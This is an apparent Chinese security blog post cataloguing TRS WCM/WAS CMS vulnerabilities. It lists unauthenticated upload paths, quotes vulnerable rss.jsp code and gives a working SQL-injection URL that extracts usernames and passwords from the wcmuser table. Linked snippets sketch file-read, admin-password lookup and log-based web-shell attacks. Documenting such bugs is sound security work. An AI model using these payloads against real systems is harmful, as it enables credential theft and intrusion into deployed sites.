TRS CMS(拓尔思CMS) 漏洞集合

最新推荐文章于 2024-08-03 14:16:19 发布
最新推荐文章于 2024-08-03 14:16:19 发布
阅读量1.7w 收藏 2
点赞数 1
分类专栏: 漏洞收集 文章标签: cms string exception 数据库 全文检索 null
TRS(拓尔思)WCM 文件上传漏洞

影响版本:

WCM5.2 WCM6.1

漏洞描述:

TRSWCM是拓尔思系列产品的重要组成部分,服务于信息资源的发布。

Lee在对WCM6.1(STD1091SP2)进行风险评估的时候发现,file_upload.html未做访问限制,攻击者可以匿名访问上传页面进行文件上传操作

说明:

file/file_upload.html

infogate/file/file_upload.html

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 TRS(拓尔思)WAS 4.5 注入漏洞
2011-01-07 14:49

影响版本:

WAS4.5

漏洞描述:

TRSWAS是拓尔思系列产品的重要组成部分,服务于信息资源的发布。

Lee在对WAS4.5进行风险评估的时候发现,rss.jsp页面"channelid"参数未进行过滤。

说明:(TRS已发布补丁)

<%
 int defaultPagesize=20;//默认返回的订阅记录数
 int defaultChnid=65114;//默认频道号
 
 String SITE="";//当前站点
 String OUTLINE="outline_trs.jsp";//概览页面
 String LOGO="images/logo.gif";//Logo路径
 String TITLE="标题";//显示为标题的数据库字段名
 String AUTHOR="作者";//显示为作者的数据库字段名
 String DATE="日期";//显示为日期的数据库字段名
 String DESCRIPTION="正文";//显示为描述的数据库字段名

 try
 {
  String chnid=request.getParameter("channelid");
  if (chnid == null || chnid.length() == 0)
      throw new WASException("1001#频道号为空#rss.jsp#");
  String[] strSep = {",", ";"};
  String[] strChnids = WASTools.splitString(chnid, strSep);
  if(chnid==null)chnid=""+defaultChnid;
  int intChnid=0;
  try
  {
   intChnid=Integer.parseInt(strChnids[0]);
  }
  catch(Exception e){}
  int pagesize=0;
  try
  {
   pagesize=Integer.parseInt(request.getParameter("prepage"));
  }
  catch(Exception e)
  {
      pagesize=defaultPagesize;
  }
  String prepage=""+pagesize;
  if(SITE==null||SITE.trim().equals(""))
   SITE="http://"+request.getServerName()+":"+request.getServerPort()+request.getContextPath(); 
%>

 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------

TRS 是英文Text Retrieval System(文本检索系统)的缩写,据说是全文检索、搜索引擎、内容管理及知识管理核心技术和产品的统一,入选2008年度国家规划布局内重点软件企业,做某些渗透经常会碰到。

MSSQL版本:/wcm//help/wcmhelp_list.jsp?trandom=0.3575719151171357&JspUrl=http%3A%2F%2F9.9.9.9%2Fwcm%2F%23%2Floginpage.jsp'%20and%20(select%20top%201%20username%2bchar(124)%2bpassword%20from%20wcmuser)>0--
ORACLE及其它版本:一位一位试吧,没代码,比较麻烦。




7禧
关注
专栏目录
渗透测试之文件下载漏洞
weixin_45380284的博客
03-06 1375
文件下载漏洞 理论: 1.一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户查看或下载的文件不做限制,则恶意用户就能够查看或下载任意敏感文件,这就是文件查看与下载漏洞。 2.利用方式: 一般链接形式: download.php?path= down.php?file= data.php?file= download.php?filename= 或者包含参数: &Src= &Inputfile= &Filepath= &Path= &Data= 当遇到
拓尔思文件读取漏洞(CNVD-2020-27769)
不忘初心,护天下安全!
07-18 1765
目前官方已经在新的版本中修复该漏洞,可从官方下载进行升级相应组件或者使用附件里的文件trswas.jar替换目录D\TRS\TRSWAS5.0\Tomcat\webapps\was5\WEB-INF\lib下的文件。拓尔思中文检索系统TRSWAS5.0web/tree接口treefile参数存在文件读取漏洞,可读取数据库配置文件、账户密码等信息,导致配置文件信息泄露威胁网站安全。如漏洞存在,则显示文件内容。...
TSCMS内容管理系统最新官方版
04-03
TSCMS内容管理系统最新官方版,TSCMS是遂宁唐氏兄弟网络技术服务有限公司独立研发的一套基于PHP+MySQL平台,采用MVC构架开发的网站建设系统,系统具有速度快,SEO友好,界操作简洁明了,模块扩展方便,二次开发简单等特点。系统支持模块标签数据调用,伪静态配置简单更有利于搜索引擎收录。您只需了解简单的HTML知识便能快速制作出专业的网站。 TSCMS v2.0 bulid20131120 更新日志: 新增安装文档增加演示数据安装选择 新增远程版本提示,增加商业授权判断,增加登陆ip显示 新增安装完后显示浏览后台,默认用户名及密码 新增后台显示登陆IP 修复导航添加模板文件字段错误 修复添加导航时设置新窗口打开无效的情况 移除演示站使用的统计代码 修复模块列表显示admin 修复ip共享主机获取内网ip错误 修复linux下内容模块tree文件引用路径大小写错误,导致tree加载失败 修复linux下部份目录权限设定错误 修得安装时错误提示信息
拓尔思TRSWAS5.0文件读取漏洞预警
weixin_46022050的博客
03-02 4435
拓尔思TRSWAS5.0文件读取漏洞预警 2018-12-13 10:48 一、漏洞描述: 拓尔思中文检索系统TRSWAS5.0web/tree接口treefile参数存在文件读取漏洞,可读取数据库配置文件、账户密码等信息,导致配置文件信息泄露威胁网站安全。 漏洞影响版本:TRSWAS 5.0 漏洞影响危害:中危 二、漏洞检测方式: 将***.com替换域名或对应IP直接访问可读取出配置文件信息。...
常见的CMS漏洞
最新发布
C233333235的博客
08-03 676
通过⽇志⽂件拿Shell 利⽤mysql⽇志⽂件写shell,这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改 这个存放位置,并且可以修改它的后缀名。查到数据库位置后,就可以大概猜测一下网站的根目录,一般www目录在phpstudt_pro下,是Extensions的同级目录。以确认我们的修改生效了,修改成功后,日志文件的后缀就被修改成了php,那么其中的php语句就会被运行。这样日志文件中就会有这个一句话木马的字样,我们去访问日志文件后,就可以进行连接获取shell。
2024-HW最新漏洞整理及相应解决方案(二)
m0_72210904的博客
07-30 1316
本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。前言:漏洞是基于部分安全厂家、软件厂商的公众号或官方网站,以及一些非官方渠道等途径整理的HW安全漏洞情报,情报里附含漏洞详情和解决方案。护网期间我将持续更新分享,希望可以在护网期间帮助到大家。
TRS cms用户注册漏洞
2ed
06-25 3401
据了解TRS WCM涵盖网站建立、内容服务、内容传递等内容价值链的各个方面,将结构化和非结构化信息提供给所有用户。 既然在外网能访问TRS WCM,那就方便许多了,由于是第一次遇到此系统,所以去wooyun上搜了一下相关漏洞利用方式,发现其实wooyun上公布的对这个系统的漏洞利用方式还是很多的,都是些高危漏洞,其中有三个高危漏洞可以很好的利用一下,TRS WCM多为gov站点使用,不过这里遇到了...
TRS的WCM历史漏洞
weixin_42140534的博客
07-30 5891
1访问网站的登录页 看到TRS WCM知道为北京拓尔思开发的一个平台,这个平台是存在相关漏洞的 2 在网址后面添加查看管理员密码的链接 wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin 3在地址栏中输入xxx:8080/wcm/app/login.jsp回车即可成功登录,且账号为system ...
CNVD-2020-27769 拓尔思TRSWAS5.0文件读取漏洞
2301_81907423的博客
12-26 668
CNVD-2020-27769 拓尔思TRSWAS5.0
TRS内容管理平台用户注册逻辑漏洞
ytfhjhv的博客
11-16 1273
TRS内容管理平台用户注册逻辑漏洞
web cms trs二次开发手册
10-30
1.1 文档的建立  本文档是专门针对WCM产品的二次开发而编写的指导性手册;它从设计原理和应用实践两个方面详细阐述了有关二次开发中所涉及的问题。  本文档是由TRS WCM产品开发组共同建立和维护的。在实际的应用中,WCM开发组有义务不断更新和补充完善本文档。 1.2 文档的组织  本文档在内容组织上,注重设计原理和应用实践两个方面并重。因为我们认为,理解设计原理是更好应用的基础,也是较深层的二次开发所必须了解的内容。  本文档在布局上,按照下面的方式安排:  本文档首先阐述了WCM中最重要的对象模型和体系,它是应用和扩展WCM的最基础、最核心的内容;  然后分别阐述了WCM中最重要的几个应用内容,包括WCM对象体系扩展、系统安全管理、系统配置、任务和计划调度及工作流支持。  最后讨论了WCM应用开发中所涉及的几个应用层面上的问题,这些问题包括并发操作的支持、中文问题及多国语言的支持,以及如何提高WCM二次开发的质量和效率。 1.3 文档的目标 在阅读完本文档后,您应当明确理解和掌握的内容是:  如何应用和扩展WCM对象体系;  如何熟练应用WCM中有关系统配置、任务和计划调度、工作流支持等关键性的扩展性支持开发;  如何熟练解决WCM应用开发中的一些应用层问题,如并发操作支持、中文问题和多国语言支持等。  最终:您应当能够熟练掌握和应用本文档中所有WCM扩展开发内容。
TRS WCM内容协作平台
07-08
TRS 内容协作平台处于TRS 内容管理基础架构的核心,秉承TRS内容管理CIO标准路线,集协作性、行业性和开放性于一体,是媒体整合、共享和利用数字内容资产,改善组织运行效率,提高核心竞争力的理想选择,可以帮助媒体快速地构建媒体网站、媒体内外信息门户、媒体办公协作平台、媒体的内容采编发平台等,实现全方位的内容管理。
TRSWCM 后台 上传 图片 工具
09-07
可以从TRSWCM的后台直接上传图片,不用手动复制到服务器中,可以自动触发站点分发。
TRSWCMV7.0数据字典
06-01
本手册介绍了该系统涉及到的关键表的 数据表设计的说明,包含表名、表字段设计等,便于使用者更深入的了解 TRS WCM 以及基于此系统 做数据的处理和开发。
TRS 拓尔思 7.0 置标操作说明手册
12-17
欢迎使用 TRS 公司的 TRS 内容协作平台(TRS WCM)。TRS WCM 为您提供了一套完全基于 Java 技术和浏览器技术的网络内容管理协作平台,实现全浏览器界面的内容创建、维护和基于模板的内容 发布,具备强大的站点管理...
TRS cms通用的常用标签整合
02-24
TRS CMS,全称为TRS内容管理系统,是一款广泛应用于政府、企业等机构的信息管理和发布平台。它提供了丰富的标签功能,便于用户自定义页面布局和内容展示。以下是对标题和描述中涉及的TRS CMS常用标签的详细解释: 1...
TRSWCM拓尔思海云集约化智能门户V8.0用户手册
12-17
TRSWCM拓尔思海云集约化智能门户V8.0用户手册》是北京拓尔思信息技术股份有限公司为用户提供的一份详尽指南,旨在帮助用户理解和操作TRS HyCloud IIP系统。该系统是一个基于Java技术和分布式技术构建的网络内容...
java 解析trs文件
05-24
TRS文件是由TRS录音笔所录制的音频文件,不是文本文件,因此无法直接解析。如果您想要获取TRS文件中的文本内容,需要先将其转换为可读取的格式,例如MP3、WAV等音频格式,然后使用语音识别技术将音频转换为文本。以下是一些Java语音识别库供您参考: 1. CMU Sphinx:一个开源的Java语音识别库,可用于离线语音识别和实时语音识别。 2. Google Cloud Speech API:Google提供的云端语音识别API,可通过Java SDK进行调用。 3. Baidu Speech Recognition API:百度提供的语音识别API,可通过Java SDK进行调用。 4. Wit.ai:一个免费的自然语言处理平台,提供了语音识别功能,可通过Java SDK进行调用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值